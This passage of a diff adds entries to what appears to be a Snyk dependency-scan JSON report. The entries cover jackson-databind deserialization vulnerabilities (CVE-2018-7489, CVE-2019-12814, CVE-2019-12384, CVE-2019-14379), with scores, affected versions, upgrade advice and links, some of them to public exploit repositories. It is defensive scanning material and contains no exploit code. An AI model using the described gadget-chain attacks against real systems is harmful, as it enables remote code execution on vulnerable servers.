+ "fixedIn": [ + "2.6.7.5", + "2.8.11.1", + "2.9.5" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.8.11.1)", + "[2.9.0,2.9.5)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/commit/6799f8f10cc78e9af6d443ed6982d00a13f2e7d2", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/1931", + "title": "GitHub Issue" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "critical", + "cvssV3Vector": 
"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 9.8, + "modificationTime": "2024-03-11T09:48:58.671582Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:53:49.486075Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:58:59.859910Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:48:58.671582Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:53:49.486075Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. It allows unauthenticated remote code execution because of an incomplete fix for the CVE-2017-7525 deserialization flaw. This is exploitable by sending maliciously crafted JSON input to the readValue method of the ObjectMapper, bypassing a blacklist that is ineffective if the `c3p0` libraries are available in the classpath.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. 
_Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. 
The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.5, 2.8.11.1, 2.9.5 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/6799f8f10cc78e9af6d443ed6982d00a13f2e7d2)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/1931)\n", + "epssDetails": { + "percentile": "0.99133", + "probability": "0.93631", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2018-7489" + ], + "CWE": [ + "CWE-502" + ], + "GHSA": [ + "GHSA-cggj-fvv3-cqwv" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2018-02-26T15:13:40.723000Z", + "functions_new": [ + { + "version": [ + "[,2.8.11.1)", + "[2.9.0,2.9.5)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2018-02-10T15:13:40Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": 
"2018-02-26T15:13:40Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:49.486075Z", + "socialTrendAlert": false, + "packagePopularityRank": 99, + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "isPinnable": false, + "isRuntime": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5", + "severityWithCritical": "high" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-450207", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N/E:P", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[2.9.0,2.9.9.1)", + "[2.8.0,2.8.11.4)", + "[,2.7.9.6)" + ] + }, + "exploit": "Proof of Concept", + "fixedIn": [ + "2.9.9.1", + "2.8.11.4", + "2.7.9.6" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "medium", + "cvssScore": 5.9, + "functions": [ + { + "version": [ + "[2.9.0,2.9.9.1)", + "[2.8.0,2.8.11.4)", + "[,2.7.9.6)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/commit/5f7c69bba07a7155adde130d9dee2e54a54f1fa5", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2341", + "title": "GitHub Issue" + }, + { + "url": "https://github.com/Al1ex/CVE-2019-12814", + "title": "PoC Repository" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "medium", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N", + "cvssV3BaseScore": 5.9, + 
"modificationTime": "2024-03-11T09:53:36.647712Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", + "cvssV3BaseScore": 7.5, + "modificationTime": "2024-03-11T09:53:50.077144Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N/E:P", + "assigner": "Snyk", + "severity": "medium", + "baseScore": 5.9, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T14:09:15.371549Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N", + "assigner": "NVD", + "severity": "medium", + "baseScore": 5.9, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:53:36.647712Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:53:50.077144Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. A Polymorphic Typing issue was discovered in FasterXML jackson-databind 2.x through 2.9.9. When Default Typing is enabled (either globally or for a specific property) for an externally exposed JSON endpoint and the service has JDOM 1.x or 2.x jar in the classpath, an attacker can send a specifically crafted JSON message that allows them to read arbitrary local files on the server.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. 
_Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. 
The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.9.1, 2.8.11.4, 2.7.9.6 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/5f7c69bba07a7155adde130d9dee2e54a54f1fa5)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2341)\n- [PoC Repository](https://github.com/Al1ex/CVE-2019-12814)\n", + "epssDetails": { + "percentile": "0.87218", + "probability": "0.01539", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2019-12814" + ], + "CWE": [ + "CWE-502" + ], + "GHSA": [ + "GHSA-cmfg-87vq-g5g4" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2019-06-19T15:28:46.421239Z", + "functions_new": [ + { + "version": [ + "[2.9.0,2.9.9.1)", + "[2.8.0,2.8.11.4)", + "[,2.7.9.6)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2019-06-19T14:34:16Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Proof of Concept", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": 
"com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2019-06-19T14:34:16Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:50.077144Z", + "socialTrendAlert": false, + "packagePopularityRank": 99, + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "isPinnable": false, + "isRuntime": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5", + "severityWithCritical": "medium" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-450917", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:H", + "credit": [ + "College of software Nankai University" + ], + "semver": { + "vulnerable": [ + "[2.9.0,2.9.9.1)", + "[2.8.0,2.8.11.4)", + "[,2.7.9.6)" + ] + }, + "exploit": "High", + "fixedIn": [ + "2.9.9.1", + "2.8.11.4", + "2.7.9.6" + ], + "patches": [], + "insights": { + "triageAdvice": "This vulnerability is only applicable when the feature Polymorphic Type Handling (PTH) is enabled." 
+ }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[2.9.0,2.9.9.1)", + "[2.8.0,2.8.11.4)", + "[,2.7.9.6)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://lists.debian.org/debian-lts-announce/2019/06/msg00019.html", + "title": "Debian Security Announcement" + }, + { + "url": "https://github.com/jas502n/CVE-2019-12384", + "title": "Exploit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/blob/a6667bcd1f0114f5b004d5203f4139b1e6104a1c/src/main/java/com/fasterxml/jackson/databind/jsontype/impl/SubTypeValidator.java", + "title": "Github Fix" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2334", + "title": "GitHub Issue" + }, + { + "url": "https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062", + "title": "Jackson CVEs Don't Panic - Blog" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/blob/a6667bcd1f0114f5b004d5203f4139b1e6104a1c/release-notes/VERSION-2.x", + "title": "Release Notes" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "medium", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N", + "cvssV3BaseScore": 5.9, + "modificationTime": "2024-03-11T09:53:36.645685Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:53:50.734463Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:H", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": 
"2024-03-06T14:04:45.683422Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N", + "assigner": "NVD", + "severity": "medium", + "baseScore": 5.9, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:53:36.645685Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:53:50.734463Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data which allows attackers to have a variety of impacts by leveraging failure to block the `logback-core` class from polymorphic deserialization. Depending on the `classpath` content, remote code execution may be possible.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. 
If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. 
\n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.9.1, 2.8.11.4, 2.7.9.6 or higher.\n## References\n- [Debian Security Announcement](https://lists.debian.org/debian-lts-announce/2019/06/msg00019.html)\n- [Exploit](https://github.com/jas502n/CVE-2019-12384)\n- [Github Fix](https://github.com/FasterXML/jackson-databind/blob/a6667bcd1f0114f5b004d5203f4139b1e6104a1c/src/main/java/com/fasterxml/jackson/databind/jsontype/impl/SubTypeValidator.java)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2334)\n- [Jackson CVEs Don't Panic - Blog](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n- [Release Notes](https://github.com/FasterXML/jackson-databind/blob/a6667bcd1f0114f5b004d5203f4139b1e6104a1c/release-notes/VERSION-2.x)\n", + "epssDetails": { + "percentile": "0.97607", + "probability": "0.53288", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2019-12384" + ], + "CWE": [ + "CWE-502" + ], + "GHSA": [ + "GHSA-mph4-vhrx-mv67" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2019-06-25T10:06:54.889582Z", + "functions_new": [ + { + "version": [ + "[2.9.0,2.9.9.1)", + "[2.8.0,2.8.11.4)", + "[,2.7.9.6)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2019-05-28T10:27:59Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + 
"maturityLevels": [ + { + "type": "secondary", + "level": "High", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2019-06-25T10:26:29Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:50.734463Z", + "socialTrendAlert": false, + "packagePopularityRank": 99, + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "isPinnable": false, + "isRuntime": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5", + "severityWithCritical": "high" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-455617", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[2.9.0,2.9.9.2)", + "[2.8.0,2.8.11.4)", + "[,2.7.9.6)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "2.9.9.2", + "2.8.11.4", + "2.7.9.6" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[2.9.0,2.9.9.2)", + "[2.8.0,2.8.11.4)", + "[,2.7.9.6)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/compare/jackson-databind-2.9.9.1...jackson-databind-2.9.9.2", + "title": "GitHub Comparison" + }, + { + "url": 
"https://github.com/FasterXML/jackson-databind/issues/2387", + "title": "GitHub Issue" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2389", + "title": "GitHub Issue" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2395", + "title": "GitHub Issue" + }, + { + "url": "https://snyk.io/blog/jackson-deserialization-vulnerability/", + "title": "Snyk Blog" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "critical", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 9.8, + "modificationTime": "2024-03-11T09:47:45.849047Z" + }, + { + "assigner": "Red Hat", + "severity": "critical", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 9.8, + "modificationTime": "2024-03-11T09:53:54.502907Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T14:09:40.033731Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:47:45.849047Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:53:54.502907Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. 
`SubTypeValidator.java` mishandles default typing when `ehcache` is used, leading to remote code execution.\n\n\n **NOTE:** This vulnerability has also been identified as: [CVE-2019-14439](https://security.snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-6056407)\n\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. 
An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.9.2, 2.8.11.4, 2.7.9.6 or higher.\n## References\n- [GitHub Comparison](https://github.com/FasterXML/jackson-databind/compare/jackson-databind-2.9.9.1...jackson-databind-2.9.9.2)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2387)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2389)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2395)\n- [Snyk Blog](https://snyk.io/blog/jackson-deserialization-vulnerability/)\n", + "epssDetails": { + "percentile": "0.83638", + "probability": "0.00984", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2019-14379" + ], + "CWE": [ + "CWE-502" + ], + "GHSA": [ + "GHSA-6fpp-rgj9-8rwc", + "GHSA-gwp4-hfv6-p7hw" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": 
"2019-07-29T14:55:33.030000Z", + "functions_new": [ + { + "version": [ + "[2.9.0,2.9.9.2)", + "[2.8.0,2.8.11.4)", + "[,2.7.9.6)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2019-07-29T12:40:42Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2019-07-29T12:40:42Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:54.502907Z", + "socialTrendAlert": false, + "packagePopularityRank": 99, + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "isPinnable": false, + "isRuntime": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5", + "severityWithCritical": "high" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-467014", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[2.9.0,2.9.10)", + "[2.7.0,2.8.11.5)", + "[,2.6.7.3)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "2.9.10", + "2.8.11.5", + "2.6.7.3" + ], + 